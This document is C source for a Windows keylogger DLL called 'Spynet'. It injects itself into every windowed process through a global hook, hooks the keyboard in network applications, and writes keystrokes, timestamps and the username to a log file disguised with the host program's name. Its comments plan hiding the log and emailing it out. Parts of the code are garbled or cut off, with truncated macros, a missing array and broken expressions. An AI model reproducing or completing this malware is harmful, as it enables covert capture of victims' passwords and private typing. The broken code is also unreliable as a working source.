#include 
#include 
#define MAX 256 // who else loves 256? =)
//my macros
#define my_toLower(x)  ((x >= 'A') && (x = 'A') && (x "
,
"/?"
,
"\\|"
};
//does ABSOLUTELY NOTHING!!!
LRESULT CALLBACK DummyProc(int nCode,WPARAM wParam,LPARAM lParam)
{
return
CallNextHookEx
(hInjectionHook,nCode,wParam,lParam);
}
//The Hook makes our Dll Injected into every process that has a Message Queue
//DRAWBACK : Console Programs are NOT hooked...
BOOL WINAPI InstallHook()
{
if
(hInjectionHook)
return
TRUE;
	hInjectionHook =
SetWindowsHookEx
(WH_CALLWNDPROC,DummyProc,g_hInstance,
0
);
return
(hInjectionHook !=
NULL
);
}
//Plz Note The Keylogger does NOT Stop...
//By Uninstalling the Injection Hook, Spynet Will not inject future instances of processes
BOOL WINAPI UninstallHook() //return true if unhook successfull
{
if
(!hInjectionHook)
return
TRUE;
//no hook to unhook
BOOL bRet =
UnhookWindowsHookEx
(hInjectionHook);
if
(bRet) hInjectionHook =
NULL
;
return
bRet;
}
BOOL AppendLog(char *szData) //MUST be ASCIIZ string
{
	DWORD dwTemp;
return
WriteFile
(g_hLogFile,szData,
strlen
(szData),&dwTemp,
0
);
}
char getShiftChar(WPARAM wParam)
{
for
(
int
i=
0
;i
1
)
			{
switch
(wParam)
				{
case
VK_RETURN :
strcpy
(szKey,
"\r\n"
);
break
;
case
VK_SPACE:
strcpy
(szKey,
" "
);
break
;
case
VK_DELETE:
strcpy
(szKey,
"[DEL]"
);
break
;
case
VK_MENU:
strcpy
(szKey,
"[ALT]"
);
break
;
case
VK_CONTROL:
strcpy
(szKey,
"[CTL]"
);
break
;
case
VK_ESCAPE :
strcpy
(szKey,
"[ESC]"
);
break
;
case
VK_BACK:
strcpy
(szKey,
"[BSP]"
);
break
;
case
VK_TAB :
strcpy
(szKey,
"[TAB]"
);
break
;
case
VK_SHIFT :
strcpy
(szKey,
"[SFT]"
);
break
;
case
VK_CAPITAL :
strcpy
(szKey,
"[CPLK]"
);
break
;
case
VK_SCROLL :
strcpy
(szKey,
"[SRLK]"
);
break
;
default
:
AppendLog
(
"["
);
strcat
(szKey,
"]"
);
break
;
				}
			}
		}
AppendLog
(szKey);
	}
return
CallNextHookEx
(hInjectionHook,nCode,wParam,lParam);
}
BOOL InstallKeyLoggerHook()
{
if
(hKLoggerHook)
return
TRUE;
	hKLoggerHook =
SetWindowsHookEx
(WH_KEYBOARD,KLogProc,g_hInstance,
0
);
return
(hKLoggerHook !=
NULL
);
}
BOOL UninstallKeyLoggerHook() //return true if unhook successfull
{
if
(!hKLoggerHook)
return
TRUE;
//no hook to unhook
BOOL bRet =
UnhookWindowsHookEx
(hKLoggerHook);
if
(bRet) hKLoggerHook =
NULL
;
return
bRet;
}
void logHeader(BOOL bBegin)
{
char
szBuf[MAX *
2
],szTemp[MAX];
	SYSTEMTIME systime;
	DWORD dwTemp;
GetLocalTime
(&systime);
if
(bBegin)
strcpy
(szBuf,
"\r\nSpynet Session Begin: "
);
else
strcpy
(szBuf,
"\r\nSpynet Session End: "
);
//[H]H:MM
wsprintf
(szTemp,
"%d:%02d, "
,systime.wHour,systime.wMinute);
strcat
(szBuf,szTemp);
//MM/DD/YYYY
wsprintf
(szTemp,
"%d/%d/%d"
,systime.wMonth,systime.wDay,systime.wYear);
strcat
(szBuf,szTemp);
if
(bBegin) 
	{
strcat
(szBuf,
"\r\nUser : "
);
		dwTemp = MAX;
GetUserName
(szTemp,&dwTemp);
strcat
(szBuf,szTemp);
	}
AppendLog
(szBuf);
}
char * GetFileName(char *Path)
{
char
*temp = Path;
for
(
int
i=
0
;Path[i] !=
0
;i++)
if
(Path[i] ==
'\\'
) temp = &Path[i+
1
];
return
temp;
}
//logs headers for log files (time,date,logged in username)
BOOL PrepareLogFile()
{
//GetWindowsDirectory(g_logPath,MAX_PATH); //or GetSystemDirectory() (recommended)
GetCurrentDirectory
(MAX_PATH,g_logPath);
//log file is created in the processes current directory
if
(g_logPath[
strlen
(g_logPath) -
1
] !=
'\\'
)
strcat
(g_logPath,
"\\"
);
strcat
(g_logPath,
GetFileName
(g_exePath));
// log file will be "iexplore.exe.log"
strcat
(g_logPath,
".log"
);

	g_hLogFile =
CreateFile
(g_logPath,GENERIC_WRITE,
NULL
,
0
,OPEN_ALWAYS,FILE_ATTRIBUTE_NORMAL,
0
);
//On Release : Add Hidden Attribute.
if
(g_hLogFile != INVALID_HANDLE_VALUE)
	{
SetFilePointer
(g_hLogFile,
0
,
0
,FILE_END);
logHeader
(TRUE);
	}
return
(g_hLogFile !=
NULL
);
}
BOOL APIENTRY DllMain(HINSTANCE hInstance,DWORD dwReason,LPVOID lpvReserved)
{
switch
(dwReason)
	{
case
DLL_PROCESS_ATTACH:
					g_hInstance = hInstance;
GetModuleFileName
(
0
,g_exePath,MAX_PATH);
GetModuleFileName
(hInstance,g_dllPath,MAX_PATH);
strcpy
(g_exePath,_strlwr(g_exePath));
#if AUTOHOOK
//first load will call injection and successfull load inspite of the process we are in...
if
(hInjectionHook ==
NULL
)
					{
InstallHook
();
return
TRUE;
					}
#endif
//instead of hardcoding the list a ".ini"
//file can be used to dynamically configure spynet
int
i;
for
(i=
0
;i<UBOUND_NETAPPLIST;i++)
					{
if
(
strstr
(g_exePath,netAppList[i]))
						{
							BOOL bRet =
PrepareLogFile
() &&
InstallKeyLoggerHook
();
return
bRet;
						}
					}
//now, normally we LoadLibrary ourself to increase the reference count
//so that we won't be "free-ed" once the original injector terminates
//BUT, since we have established a WH_KEYBOARD hook
// in the process so we won't be unloaded till we have the keyboard hook...
return
FALSE;
break
;
case
DLL_PROCESS_DETACH:
UninstallKeyLoggerHook
();
if
(g_hLogFile) 
					{
logHeader
(FALSE);
CloseHandle
(g_hLogFile);
					}
break
;
	}
return
TRUE;
}
//TODO :
// Add Hot Key to Stop Keylogging...
// Evil stuff i haven't thought of yet...
// Email the Log File...